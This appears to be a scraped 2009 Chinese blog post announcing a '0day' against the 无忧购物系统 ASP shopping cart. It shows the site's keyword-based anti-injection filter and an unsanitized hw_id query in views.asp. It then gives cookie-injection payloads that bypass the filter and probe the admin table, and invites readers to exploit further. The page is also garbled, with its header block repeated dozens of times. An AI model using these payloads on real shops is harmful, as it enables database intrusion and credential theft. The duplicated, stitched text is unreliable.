Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2914325
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914326
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914327
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914328
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914329
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914330
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914331
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914332
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914333
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914324
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914335
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914336
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914337
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914338
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914339
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914340
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914341
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914342
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914343
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914344
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914345
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914346
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914347
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914348
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914339
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914350
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914351
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914352
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914353
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914354
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914355
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914356
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914357
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914358
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914359
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914360
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914361
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914362
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914363
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914354
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914365
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914366
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914367
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914368
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914369
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914370
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914371
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914372
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914373
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914374
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914375
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 2914376
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%>

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42123) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
